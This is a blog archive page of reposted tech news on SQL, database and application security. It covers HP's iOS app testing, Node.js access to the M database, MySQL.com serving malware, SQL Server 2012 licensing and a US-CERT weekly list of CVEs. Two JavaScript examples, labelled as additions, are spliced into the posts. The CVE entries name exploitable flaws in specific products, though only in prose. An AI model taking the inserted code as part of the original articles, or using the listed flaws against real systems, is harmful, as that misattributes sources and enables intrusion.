Archive for the ‘SQL’ Category

HP: 90 percent of Apple iOS mobile apps show security vulnerabilities

Tuesday, November 19th, 2013

HP today said security testing it conducted on more than 2,000 Apple iOS mobile apps developed for commercial use by some 600 large companies in 50 countries showed that nine out of 10 had serious vulnerabilities.

Mike Armistead, HP vice president and general manager, said testing was done on apps from 22 iTunes App Store categories that are used for business-to-consumer or business-to-business purposes, such as banking or retailing. HP said 97 percent of these apps inappropriately accessed private information sources within a device, and 86 percent proved to be vulnerable to attacks such as SQL injection.

The Apple guidelines for developing iOS apps help developers but this doesn’t go far enough in terms of security, says Armistead. Mobile apps are being used to extend the corporate website to mobile devices, but companies in the process “are opening up their attack surfaces,” he says.

In its summary of the testing, HP said 86 percent of the apps tested lacked the means to protect themselves from common exploits, such as misuse of encrypted data, cross-site scripting and insecure transmission of data.

The same number did not have security built into the early part of the development process, according to HP. Three quarters “did not use proper encryption techniques when storing data on mobile devices, which leaves unencrypted data accessible to an attacker.” A large number of the apps did not implement SSL/HTTPS correctly. To discover weaknesses in apps, HP advises that developers adopt practices such as application security scanning, penetration testing and a secure development life-cycle.

The need to develop mobile apps quickly for business purposes is one of the main contributing factors leading to weaknesses in these apps made available for public download, according to HP. And the weakness on the mobile side is impacting the server side as well.

“It is our earnest belief that the pace and cost of development in the mobile space has hampered security efforts,” HP says in its report, adding that “mobile application security is still in its infancy.”

Source:  infoworld.com

Node.js integrates with M: Next big thing in healthcare IT

Thursday, February 7th, 2013

Join the M revolution and the next big thing in healthcare IT: the integration of the node.js programming language with the NoSQL hierarchical database, M.

M was developed to organize and access with high efficiency the type of data that is typically managed in healthcare, thus making it uniquely well-suited for the job.

One of the biggest reasons for the success of M is that it integrates the database into the language in a natural and seamless way. The growth and involvement of the community of M developers, however, has stayed below the radar of educators and the larger IT community. As a consequence, M has faced challenges in recruiting young new developers, despite the critical importance of this technology to the Health IT infrastructure of the US.

At the recent 26th VistA Community Meeting, an exciting alternative was presented by Rob Tweed. I summarize it as: Node.js meets the M Database.

In his work, Rob has created an intimate integration between the M database and the language features of node.js. The result is a new way of accessing the M database from JavaScript code, in such a way that developers do not feel that they are accessing a database at all.

It is now possible to access M from node.js, both when using the M implementation of Intersystems Cache and with the open source M implementation of GT.M. This second interface was implemented by David Wicksell, based on the API previously defined for Cache in the GlobalsDB project.

In a recent blog post, Rob describes some of the natural notation in node.js that provides access to the M hierarchical database by nicely following the language patterns of JavaScript. Here are some of Rob’s examples:

The M expression:

set town = ^patient(123456, "address", "town")

becomes the JavaScript expression:

 var town = patient.$('address').$('town')._value;

with some flavor of jQuery.

The following M expression of a healthcare typical example:

^patient(123456,"birthdate")=-851884200
^patient(123456,"conditions",0,"causeOfDeath")=""
^patient(123456,"conditions",0,"codes","ICD-10-CM",0)="I21.01"
^patient(123456,"conditions",0,"codes","ICD-9-CM",0)="410.00"
^patient(123456,"conditions",0,"description")="Diagnosis, Active: Hospital Measures - AMI (Code List: 2.16.840.1.113883.3.666.5.3011)"
^patient(123456,"conditions",0,"end_time")=1273104000

becomes the following JSON data structure, which can be manipulated with JavaScript:

var patient = new ewd.GlobalNode("patient", [123456]);
patient._delete();

var document = {
  "birthdate": -851884200,
  "conditions": [
    {
      "causeOfDeath": null,
      "codes": {
        "ICD-9-CM": [
          "410.00"
        ],
        "ICD-10-CM": [
          "I21.01"
        ]
      },
      "description": "Diagnosis, Active: Hospital Measures - AMI (Code List: 2.16.840.1.113883.3.666.5.3011)",
      "end_time": 1273104000
    }
  ]
};

More detailed examples are provided in Rob’s blog post. The M module for node.js is available here.
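To make the mapping concrete, here is an added JavaScript example that is not from Rob's post or from the ewdGlobals module: a small in-memory stand-in for an M global (the GlobalStore class and its method names are this example's own) with the two conversions the post describes, nested object to subscripted nodes and back, run over the patient document above.

```javascript
// Added example (not from the post or the ewdGlobals module): an in-memory
// model of an M global plus the JSON <-> subscripted-node conversions the
// post describes. GlobalStore and its method names are this example's own.
// The sample document mirrors the ^patient(123456,...) nodes quoted above.

class GlobalStore {
  constructor() {
    this.nodes = new Map(); // JSON-encoded subscript list -> leaf value
  }
  set(subs, value) { this.nodes.set(JSON.stringify(subs), value); }
  get(subs) { return this.nodes.get(JSON.stringify(subs)); }
  // Remove every node at or under a subscript prefix (what M's KILL does).
  kill(prefix) {
    for (const key of [...this.nodes.keys()]) {
      const subs = JSON.parse(key);
      if (prefix.every((s, i) => subs[i] === s)) this.nodes.delete(key);
    }
  }
  // Every node strictly below a prefix, as [subscripts, value] pairs.
  under(prefix) {
    const out = [];
    for (const [key, value] of this.nodes) {
      const subs = JSON.parse(key);
      if (subs.length > prefix.length && prefix.every((s, i) => subs[i] === s)) out.push([subs, value]);
    }
    return out;
  }
}

// Print a subscript list the way M writes a global reference.
function mRef(subs) {
  const [name, ...rest] = subs;
  const fmt = (s) => (typeof s === 'number' ? String(s) : JSON.stringify(s));
  return rest.length ? `^${name}(${rest.map(fmt).join(',')})` : `^${name}`;
}

// JSON -> M: object keys become string subscripts, array indices numeric
// subscripts, and null becomes "" (M has no null; the post's data shows "").
function setDocument(store, root, doc) {
  store.kill(root); // replace, never merge, so no stale nodes survive
  const walk = (subs, value) => {
    if (value === null) return store.set(subs, '');
    if (Array.isArray(value)) return value.forEach((v, i) => walk([...subs, i], v));
    if (typeof value === 'object') return Object.entries(value).forEach(([k, v]) => walk([...subs, k], v));
    return store.set(subs, value);
  };
  walk(root, doc);
}

// M -> JSON: a level whose subscripts are exactly 0..n-1 becomes an array,
// any other level an object, and a "" leaf becomes null. A node holding both
// a value and descendants (legal in M) is not modelled here.
function getDocument(store, root) {
  const below = store.under(root);
  if (below.length === 0) {
    const leaf = store.get(root);
    return leaf === '' ? null : leaf;
  }
  const children = new Map(); // next-level subscript -> full path
  for (const [subs] of below) {
    const key = subs[root.length];
    if (!children.has(key)) children.set(key, [...root, key]);
  }
  const keys = [...children.keys()];
  const numeric = keys.every((k) => typeof k === 'number');
  const sorted = numeric ? [...keys].sort((a, b) => a - b) : keys;
  const isArray = numeric && sorted.every((k, i) => k === i);
  if (isArray) return sorted.map((k) => getDocument(store, children.get(k)));
  const obj = {};
  for (const k of keys) obj[k] = getDocument(store, children.get(k));
  return obj;
}

// Constructed sample: the patient document from the post.
const patientDoc = {
  birthdate: -851884200,
  conditions: [{
    causeOfDeath: null,
    codes: { 'ICD-9-CM': ['410.00'], 'ICD-10-CM': ['I21.01'] },
    description: 'Diagnosis, Active: Hospital Measures - AMI (Code List: 2.16.840.1.113883.3.666.5.3011)',
    end_time: 1273104000,
  }],
};

function demo() {
  const store = new GlobalStore();
  setDocument(store, ['patient', 123456], patientDoc);
  const path = ['patient', 123456, 'conditions', 0, 'codes', 'ICD-10-CM', 0];
  return {
    nodeCount: store.nodes.size, // one leaf per line of the M listing above
    ref: mRef(path),              // the M reference for that leaf
    code: store.get(path),        // same value the post reads via $('codes')...
    causeOfDeath: store.get(['patient', 123456, 'conditions', 0, 'causeOfDeath']),
    roundTrip: getDocument(store, ['patient', 123456]),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Two conventions in the post's data that the code enforces are worth noting: array indices become numeric subscripts starting at 0, and JSON null is stored as the empty string, since M has no null value.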

What this achieves is seamless integration between the powerful M hierarchical database and the language features of the very popular node.js implementation of JavaScript. This integration becomes a great opportunity for hundreds of node.js developers to join the space of healthcare IT, and to do, as Tim O’Reilly advises: Work on Stuff that Matters!

M is currently being used in hundreds of hospitals in the public sector:

  • The Department of Veterans Affairs
  • The Department of Defense
  • The Indian Health Service

As well as hundreds of hospitals in the private sector:

  • Kaiser Permanente hospital system
  • Johns Hopkins
  • Beth Israel Deaconess Medical Center
  • Harvard Medical School

In particular at deployments of these EHR systems:

  • Epic
  • GE/Centricity
  • McKesson
  • Meditech

Given this, and the large popularity of JavaScript and the high efficiency of node.js, this may be the most significant event happening in healthcare IT in recent years.

If you are an enthusiast of node.js, or you are looking for the best next language to learn, or you want to do some social good, this could be the thing for you.

Source:  opensource.com

Is application security the glaring hole in your defense?

Tuesday, March 27th, 2012

When it comes to security, a large number of organizations have a glaring hole in their defenses: their applications.

A recent study of more than 800 IT security and development professionals reports that most organizations don’t prioritize application security as a discipline, despite the fact that SQL injection attacks are the leading root cause of data breaches. The second-highest root cause is exploited vulnerable code in Web 2.0/social media applications.

Sixty-eight percent of developers’ organizations and 47 percent of security practitioners’ organizations suffered one or more data breaches in the past 24 months due to hacked or compromised applications. A further 19 percent of security practitioners and 16 percent of developers were uncertain if their organization had suffered a data breach due to a compromised or hacked application. Additionally, only 12 percent of security practitioners and 11 percent of developers say all their organizations’ applications meet regulations for privacy, data protection and information security.

Despite the data breaches resulting from hacked or compromised applications and the lack of compliance with regulations, 38 percent of security practitioners and 39 percent of developers say less than 10 percent of the IT security budget is dedicated to application security.

“We set out to measure the tolerance to risk across the established phases of application security, and define what works and what hasn’t worked, how industries are organizing themselves and what gaps exist,” says Dr. Larry Ponemon, CEO of the Ponemon Institute, the research firm that conducted the study on the behalf of security firm Security Innovation. “We accomplished that, but what we also found was a drastic divide between the IT security and development organizations that is caused by a major skills shortage and a fundamental misunderstanding of how an application security process should be developed. This lack of alignment seems to hurt their business based on not prioritizing secure software, but also not understanding what to do about it.”

The study found that security practitioners and developers were far apart in their perception of the issue. While one might expect that security practitioners held the more cynical views with regard to application security, in fact the opposite was true. Dr. Ponemon says 71 percent of developers say application security was not adequately emphasized during the application development lifecycle, compared with 49 percent of security practitioners who felt the same way. Additionally, 46 percent of developers say their organization had no process for ensuring security is built into new applications, while only 21 percent of security practitioners believed that to be the case.

Developers and security practitioners are also divided on the issue of remediating vulnerable code. Nearly half (47 percent) of developers say their organization has no formal mandate to remediate vulnerable code, while 29 percent of security practitioners say the same.

“What emerged in this study was that companies don’t seem to be looking at the root causes of data breaches, and they aren’t moving very fast to bridge the existing gaps to fix the myriad of problems,” says Ed Adams, CEO of Security Innovation. “The threat landscape has grown substantially in scope, most notably as our survey respondents stated that Web 2.0 and mobile attacks are the targets of the next wave of threats beyond just web applications.”

The survey also found that nearly half of developers say there is no collaboration between their development organization and the security organization when it comes to application security. That’s a stark contrast from the 19 percent of security practitioners that say there is no collaboration.

Lack of Collaboration in Application Security

“We basically found that developers were much more likely to think there was a lack of collaboration,” Dr. Ponemon says. “The security folks, on the whole, thought the collaboration was OK. I think that one of the biggest problems is that the security folks think they’re getting the word out on collaborating or helping, but they’re not doing so effectively.”

In other words, Dr. Ponemon says, the security organization writes its security policy and gives it to developers, but the developers, by and large, don’t understand how to implement that policy. The security organizations think they’ve done their job, but they haven’t managed to make their policy contextual for developers.

“We find that process has no bearing whatsoever on the ability of an organization to write secure code,” Dr. Ponemon says. “It doesn’t take any longer to write a line of secure code than it does to write a line of insecure code. You just have to know which one to write.”

Education Is Key to Application Security

But knowing which line of code to write seems to be a large part of the problem. The study found that only 22 percent of security practitioners and 11 percent of developers say their organization has a fully deployed application security training program. Fully 36 percent of security practitioners and 37 percent of developers say their organization had no application security training program and no plans to deploy one.

Adams believes providing that education will go a long way toward helping organizations secure their applications and minimize the risk.

“This is more of an education problem than anything else,” Adams says. “In the late 90s, everybody was putting their applications on the web. But they kept on crashing. It was really a performance problem: The developers didn’t know how to code for performance. Amazingly, that’s what’s happening in the world today. Organizations are buying application security tools before they get application security training. You have to get trained on the technique first.”

Source:  networkworld.com

Oracle claims new MySQL Cluster does 1 billion queries per minute—in NoSQL

Friday, February 17th, 2012

Oracle has announced the general availability of MySQL Cluster 7.2 as a GPL download, and claims to have achieved a benchmark of 1 billion queries per minute and 110 million updates per minute on an eight-server cluster. Those results, based on the flexAsynch test in the DBT-2 benchmark, were attained using a new NoSQL NDB C++ API.

Mikael Ronstrom, senior MySQL architect at Oracle, described the test rig for the benchmark in a blog post on February 15. He said that the server cluster used in the test ran on eight two-socket servers, each running one data node, “using X5670 with Infiniband interconnect and 48GB of memory per machine.” Ten other machines ran the flexAsynch queries against the cluster.

In the flexAsynch test, “each read is a transaction consisting of a read of an entire row consisting of 25 attributes, each 4 bytes in size,” he wrote. “flexAsynch uses the asynchronous feature of the NDB API which enables one thread to send off multiple transactions in parallel. This is handled similarly to how Node.js works with callbacks registered that reports back when a transaction is completed.”

The results were an eight-fold improvement over a similar benchmark run by Oracle last year. But given that there aren’t any published flexAsynch results from any other vendor, it’s hard to say exactly what these results mean, or how the performance compares to other open-source NoSQL databases.

Source:  arstechnica.com

Microsoft to move to license-by-core for SQL Server 2012

Wednesday, November 16th, 2011

Hmmm…think back to 2005, when Microsoft was marketing its plans to release a new version of Microsoft SQL Server (2005). Remember how Microsoft executives swore that, “unlike Oracle”, they would never count the number of cores, only the number of physical processors? Well, Oracle changed its licensing model in 2008, and in 2012 so will Microsoft. But in reverse: Oracle got a bit looser and Microsoft will be getting tighter.

With the release of Microsoft SQL Server 2012 (projected for first half of 2012), Microsoft is changing some recent and some long standing licensing rules.  The following is based upon the licensing details released by Microsoft as of November 3, 2011. Things can change, so make sure you’re looking at the most current documentation (and I’ll try to keep you current here as well).

Microsoft SQL Server Editions:

  1. Enterprise Edition – license only as per core model (last day to buy Enterprise Edition in Server/CAL model is 6/30/2012 with some potential exceptions for existing agreements – see “Software Assurance Implications” below).
  2. Business Intelligence – included in the Enterprise Edition or license separately but only as server/CAL (Client Access License)
  3. Standard Edition – license in either server/CAL or per core model.
  4. Additional editions without licensing changes:
    1. Web Edition (only available for hosting companies through the SPLA agreement)
    2. Developer
    3. Express
    4. Compact
  5. Discontinued editions:
    1. Datacenter (migrate to Enterprise)
    2. Workgroup (migrate to Standard)
    3. Standard for Small Business (migrate to Standard)

For more information on what these editions can (and can’t) do, take a look at the edition comparison.

Core versus Processor Licensing:

Prior to SQL Server 2012 (going back as far as SQL Server 2000), Microsoft SQL Server could be purchased as either a Server/CAL licensing model or a (physical) Processor licensing model. Under the Server/CAL model the server was licensed and each user (person or device) needed a CAL. For situations where the number of users was large or could not be counted, Processor licensing was more appropriate as it licensed the server by physical processors regardless of the number of users.

For example, one of my clients has their SQL Server environment running on a quad processor box with each processor having 10 cores. They are running all of their SQL on this environment (approximately 15 virtual servers).  To license this under Microsoft SQL Enterprise 2008R2 they licensed it with 4 processor licenses (each allowing up to 4 virtuals of either Standard or Enterprise).  To license under Microsoft SQL Server Enterprise 2012 they would license it as 40 (4×10) core licenses. (See the note about “Software Assurance Implications” below).  However; under the 2012 licensing this would now allow them to have unlimited virtuals (and since they licensed it with Microsoft Windows Datacenter edition for the operating system they are covered there as well).

Core-based licenses will be sold in two-core packs. According to Microsoft, a core license will be priced at ¼ the price of a SQL Server 2008R2 processor license. So if you’re running a ratio of 4 cores per physical processor your end cost shouldn’t change, but at anything more than that your costs will be going up.

Physical:

  1. All cores in the server must be licensed
  2. A minimum of 4 core licenses required for each physical processor

Virtual:

  1. Individual virtual machines may be licensed (as opposed to all cores in the physical server)
  2. A minimum of 4 core licenses per virtual machine

Virtualization:

Microsoft SQL Server 2012 will handle virtualization under two options:

  1. License individual virtual machines (either by server/CAL or by core)
    1. Remember, there is a minimum of 4 core licenses per virtual machine.
  2. License the physical machine for all virtual machines by licensing all physical cores and purchasing/maintaining Microsoft Software Assurance.
    1. Licensing this way allows for unlimited virtual machines (this is referring to SQL Server only, don’t forget you still have to license the Microsoft Windows Operating System).
    2. Note the requirement to have SA in order to license all virtuals!

Software Assurance Implications

For customers who have active Microsoft Software Assurance (SA) on their SQL Server licenses as of the release of Microsoft SQL Server 2012, there are some special rules and benefits (read: evaluate your environment to see if you need to acquire some licenses with SA before the release).

Existing SQL Server Processor licenses (Standard or Enterprise) with SA:

May upgrade to SQL Server 2012 at no additional cost.
At the end of the SA benefit term, these licenses will transition to Core licenses at a minimum of 4 core licenses per processor, or the actual number of cores in use if that is higher. Customers who are using more than 4 cores per processor should perform a self-inventory (with a tool that will provide an accurate time/date stamped inventory of hardware tied to the SQL Server installations) to ensure that they have documentation to receive all of the core licenses that they are entitled to receive.

Existing SQL Datacenter Processor licenses with SA:

Same as above for Standard or Enterprise but the conversion is a minimum of 8 core Enterprise Edition licenses.

Existing SQL Server Enterprise Edition Server/CAL with SA:

May upgrade to SQL Server 2012 at no additional cost and Enterprise Edition server SA can be maintained through end of term. However; these servers are limited to a 20 core per server license maximum.

At the end of the SA benefit term, these licenses will transition to Core licenses at a minimum of 4 core licenses per processor, or the actual number of cores in use if that is higher, up to the maximum of 20 outlined above. Customers who are using more than 4 cores per processor should perform a self-inventory (with a tool that will provide an accurate time/date stamped inventory of hardware tied to the SQL Server installations) to ensure that they have documentation to receive all of the core licenses that they are entitled to receive.

Special Rules for Volume Licensing:

Enterprise and Enrollment for Enterprise Application (EAP) agreements that have SQL Server Enterprise enrolled as a product: Can continue to purchase Enterprise edition as Server/CAL or Processor license through the end of their agreement term. At the end of the agreement the licenses will transition to Core licenses as outlined above for SA benefits.

Please note, this right to continue purchasing the Enterprise edition as Server/CAL or Processor license does not apply to Microsoft Select or Select Plus customers unless SQL is on a current EA or EAP.

In my opinion, this is a major change in Microsoft licensing, so there is every possibility that things might change a bit between now and when the product is actually released. I recommend making sure you are receiving up to date information and are pre-planning for how this change will impact your organization, as there are some opportunities to leverage SA benefits at the time of license conversion.

FYI, for those wondering…no – as of this time there is no indication that this type of licensing change will be applied to other Microsoft software…but remember, licensing terms are constantly changing!

Source:  networkworld.com

Hacked MySQL.com used to serve Windows malware

Tuesday, September 27th, 2011

The MySQL site, whose open-source repository serves some of the most popular Web sites, has been hacked and was being used to serve malware to visitors running Windows before it was cleaned up today, a security firm said.

Armorize Chief Executive Wayne Huang and some of his firm’s researchers warned about the attack in a blog post today.

MySQL.com acted quickly to remove the malware so computers would stop getting infected, but Huang told CNET he did not know how long site visitors were vulnerable or how many may have been infected. Armorize estimated that MySQL.com gets more than 100,000 page views a day and more than 34,000 unique daily visitors.

“The infection rate tends to be high for these types of attacks,” he said. “They handled it very quickly but that doesn’t mean they cleaned up the backdoors the attackers left” on the site.

Huang said he did not know how dangerous an infection would be to a computer that was hit with one, except to say that the malware would be very difficult to clean up and would still be running on the machine even after a reboot.

“We haven’t gone in depth in analyzing what this particular piece of malware does,” he said. “We know it changes some of your Windows .dlls (Dynamic-link libraries), probably to make sure it is permanently installed and running all the time. You may be able to clean it up, but it won’t be a trivial process.”

MySQL.com representatives could not be reached for comment this afternoon. Representatives from Oracle, which owns MySQL.com, did not immediately respond to e-mails and calls seeking comment.

Before the infection was removed, the compromise redirected traffic to a BlackHole exploit pack that forces the browser to install a piece of malware on the machine, according to the Armorize Malware Blog.

“It exploits the visitor’s browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java,…), and upon successful exploitation, permanently installs a piece of malware into the visitor’s machine, without the visitor’s knowledge,” the blog says. “The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.”

The Armorize blog also has a video showing how a visitor’s machine could have gotten infected from the MySQL.com site. Only 4 out of 44 vendors on VirusTotal site can detect the malware, Armorize said.

Meanwhile, Brian Krebs of the Krebs on Security blog said he had noticed someone selling administrative access to MySQL.com on an exclusive Russian underground hacker forum a few days ago for $3,000.

“I think it’s very likely that it’s related, esp with these Russian forums,” said Huang.

Source:  CNET

Vulnerability Summary for the Week of July 25, 2011

Monday, August 1st, 2011

National Cyber Alert System
Cyber Security Bulletin SB11-213

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cyber Security Division (NCSD) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High – Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 – 10.0
  • Medium – Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 – 6.9
  • Low – Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 – 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.
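As an added example that is not part of the US-CERT bulletin, the JavaScript below parses rows in the run-together "vendor, em-dash, product, description, published date, score, CVE" layout the tables that follow use, labels each row with the CVSS severity bands defined above, and flags any row filed under the wrong heading. The row regex is this example's reading of that layout; the sample rows are copied from this bulletin.

```javascript
// Added example (not part of the US-CERT bulletin): parse bulletin rows and
// apply the CVSS v2 severity bands listed above. ROW_RE is this example's
// reading of the run-together row layout; the sample rows are copied from
// the High and Medium tables of this bulletin.

// vendor, em-dash, product, free-text description, ISO date, score, CVE id
const ROW_RE = /^(\S+) \u2014 (\S+) (.+?) (\d{4}-\d{2}-\d{2}) (\d{1,2}\.\d) (CVE-\d{4}-\d{4,})$/;

// Severity bands exactly as the bulletin defines them for CVSS base scores.
function severity(score) {
  if (!(score >= 0 && score <= 10)) throw new RangeError(`CVSS base score out of range: ${score}`);
  if (score >= 7.0) return 'High';
  if (score >= 4.0) return 'Medium';
  return 'Low';
}

// One bulletin row -> structured record, or null for non-row lines
// (section headings, column legends, navigation residue such as "Back to top").
function parseRow(line) {
  const m = ROW_RE.exec(line.trim());
  if (!m) return null;
  const [, vendor, product, description, published, scoreText, cve] = m;
  const score = Number(scoreText);
  return { vendor, product, description, published, score, cve, severity: severity(score) };
}

// Parse a section and report any row whose score does not belong under
// the heading it was filed in.
function parseSection(heading, lines) {
  const expected = heading.replace(/ Vulnerabilities$/, '');
  const rows = [];
  const misfiled = [];
  for (const line of lines) {
    const row = parseRow(line);
    if (row === null) continue;
    rows.push(row);
    if (row.severity !== expected) misfiled.push(row.cve);
  }
  return { rows, misfiled };
}

// Pick out the SQL injection entries, the theme of this archive page.
function sqlInjectionRows(rows) {
  return rows.filter((r) => /SQL injection/i.test(r.description)).map((r) => r.cve);
}

// Sample rows copied from the High and Medium tables of this bulletin.
const SAMPLE_HIGH = [
  'High Vulnerabilities',
  'jan_wolter \u2014 mod_authnz_external SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field. 2011-07-28 7.5 CVE-2011-2688',
  'nrl \u2014 opie Multiple off-by-one errors in opiesu.c in opiesu in OPIE 2.4.1-test1 and earlier might allow local users to gain privileges via a crafted command line. 2011-07-26 7.2 CVE-2011-2489',
];
const SAMPLE_MEDIUM = [
  'cisco \u2014 sa500_software SQL injection vulnerability in the web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCtq65669. 2011-07-28 5.0 CVE-2011-2546',
  'debian \u2014 apt APT before 0.8.15.2 does not properly validate inline GPG signatures, which allows man-in-the-middle attackers to install modified packages via vectors involving lack of an initial clearsigned message. 2011-07-26 4.3 CVE-2011-1829',
];

const high = parseSection('High Vulnerabilities', SAMPLE_HIGH);
const medium = parseSection('Medium Vulnerabilities', SAMPLE_MEDIUM);
console.log([...high.rows, ...medium.rows]
  .map((r) => `${r.cve} ${r.score} ${r.severity} ${r.vendor}/${r.product} (${r.published})`)
  .join('\n'));
console.log('misfiled:', [...high.misfiled, ...medium.misfiled]);
console.log('SQL injection entries:', sqlInjectionRows([...high.rows, ...medium.rows]));
```

The severity function deliberately rejects scores outside 0.0 to 10.0 rather than silently binning them, so a garbled score column surfaces as an error instead of a wrong label.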

High Vulnerabilities
Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
azeotech — daqfactory AzeoTech DAQFactory before 5.85 (Build 1842) does not perform authentication for certain signals, which allows remote attackers to cause a denial of service (system reboot or shutdown) via a signal. 2011-07-28 7.8 CVE-2011-2956
ca — gateway_security Icihttp.exe in CA Gateway Security for HTTP, as used in CA Gateway Security 8.1 before 8.1.0.69 and CA Total Defense r12, does not properly parse URLs, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption and daemon crash) via a malformed request. 2011-07-28 10.0 CVE-2011-2667
cisco — sa500_software The web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote authenticated users to execute arbitrary commands via crafted parameters to web forms, aka Bug ID CSCtq65681. 2011-07-28 9.0 CVE-2011-2547
cisco — asr_9006_router Unspecified vulnerability in Cisco IOS XR 4.1.x before 4.1.1 on Cisco Aggregation Services Routers (ASR) 9000 series devices allows remote attackers to cause a denial of service (line-card reload) via an IPv4 packet, aka Bug ID CSCtr26695. 2011-07-28 7.8 CVE-2011-2549
drupal — drupal Drupal 7.x before 7.3 allows remote attackers to bypass intended node_access restrictions via vectors related to a listing that shows nodes but lacks a JOIN clause for the node table. 2011-07-26 7.5 CVE-2011-2687
gimp — gimp Heap-based buffer overflow in the read_channel_data function in file-psp.c in the Paint Shop Pro (PSP) plugin in GIMP 2.6.11 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a PSP_COMP_RLE (aka RLE compression) image file that begins a long run count at the end of the image. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4543. 2011-07-26 7.5 CVE-2011-1782
google — picasa Google Picasa before 3.6 Build 105.67 does not properly handle invalid properties in JPEG images, which allows remote attackers to execute arbitrary code via a crafted image file. 2011-07-28 9.3 CVE-2011-2747
ibm — lotus_symphony Multiple unspecified vulnerabilities in IBM Lotus Symphony 3 before FP3 have unknown impact and attack vectors, related to “critical security vulnerability issues.” 2011-07-27 10.0 CVE-2011-2884
jan_wolter — mod_authnz_external SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field. 2011-07-28 7.5 CVE-2011-2688
nrl — opie Multiple off-by-one errors in opiesu.c in opiesu in OPIE 2.4.1-test1 and earlier might allow local users to gain privileges via a crafted command line. 2011-07-26 7.2 CVE-2011-2489
nrl — opie opielogin.c in opielogin in OPIE 2.4.1-test1 and earlier does not check the return value of the setuid system call, which allows local users to gain privileges by arranging for an account to already be running its maximum number of processes. 2011-07-26 7.2 CVE-2011-2490

Medium Vulnerabilities
Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
chyrp — chyrp upload_handler.php in the swfupload extension in Chyrp 2.0 and earlier relies on client-side JavaScript code to restrict the file extensions of uploaded files, which allows remote authenticated users to upload a .php file, and consequently execute arbitrary PHP code, via a write_post action to the default URI under admin/. 2011-07-26 6.5 CVE-2011-2745
cisco — sa500_software SQL injection vulnerability in the web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCtq65669. 2011-07-28 5.0 CVE-2011-2546
debian — apt | APT before 0.8.15.2 does not properly validate inline GPG signatures, which allows man-in-the-middle attackers to install modified packages via vectors involving lack of an initial clearsigned message. | 2011-07-26 | 4.3 | CVE-2011-1829
ecava — integraxor | Multiple cross-site scripting (XSS) vulnerabilities in Ecava IntegraXor before 3.60 (Build 4080) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. | 2011-07-28 | 4.3 | CVE-2011-2958
fabfile — fabric | Fabric before 1.1.0 allows local users to overwrite arbitrary files via a symlink attack on (1) a /tmp/fab.*.tar file or (2) certain other files in the top level of /tmp/. | 2011-07-26 | 4.4 | CVE-2011-2185
google — search_appliance | Cross-site scripting (XSS) vulnerability in Google Search Appliance before 5.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. | 2011-07-28 | 4.3 | CVE-2011-1339
ibm — lotus_symphony | IBM Lotus Symphony 3 before FP3 allows remote attackers to cause a denial of service (application crash) via the sample .doc document that incorporates a user-defined toolbar. | 2011-07-27 | 4.3 | CVE-2011-2885
ibm — lotus_symphony | IBM Lotus Symphony 3 before FP3 allows remote attackers to cause a denial of service (application crash) via a .docx document with empty bullet styles for parent bullets. | 2011-07-27 | 4.3 | CVE-2011-2886
ibm — lotus_symphony | IBM Lotus Symphony 3 before FP3 on Linux allows remote attackers to cause a denial of service (application crash) via a certain sample document. | 2011-07-27 | 4.3 | CVE-2011-2887
ibm — lotus_symphony | IBM Lotus Symphony 3 before FP3 allows remote attackers to cause a denial of service (application hang) via complex graphics in a presentation. | 2011-07-27 | 4.3 | CVE-2011-2888
ibm — lotus_symphony | The DataPilot feature in IBM Lotus Symphony 3 before FP3 allows user-assisted remote attackers to cause a denial of service (application crash) via a large .xls spreadsheet with an invalid Value reference. | 2011-07-27 | 4.3 | CVE-2011-2893
joomla — joomla! | Joomla! before 1.5.23 does not properly check for errors, which allows remote attackers to obtain sensitive information via unspecified vectors. | 2011-07-27 | 5.0 | CVE-2011-2488
joomla — joomla! | Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.6.4 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to the com_contact component, as demonstrated by the Itemid parameter to index.php; (2) the query string to the com_content component, as demonstrated by the filter_order parameter to index.php; (3) the query string to the com_newsfeeds component, as demonstrated by an arbitrary parameter to index.php; or (4) the option parameter in a reset.request action to index.php; and, when Internet Explorer or Konqueror is used, (5) allow remote attackers to inject arbitrary web script or HTML via the searchword parameter in a search action to index.php in the com_search component. | 2011-07-27 | 4.3 | CVE-2011-2509
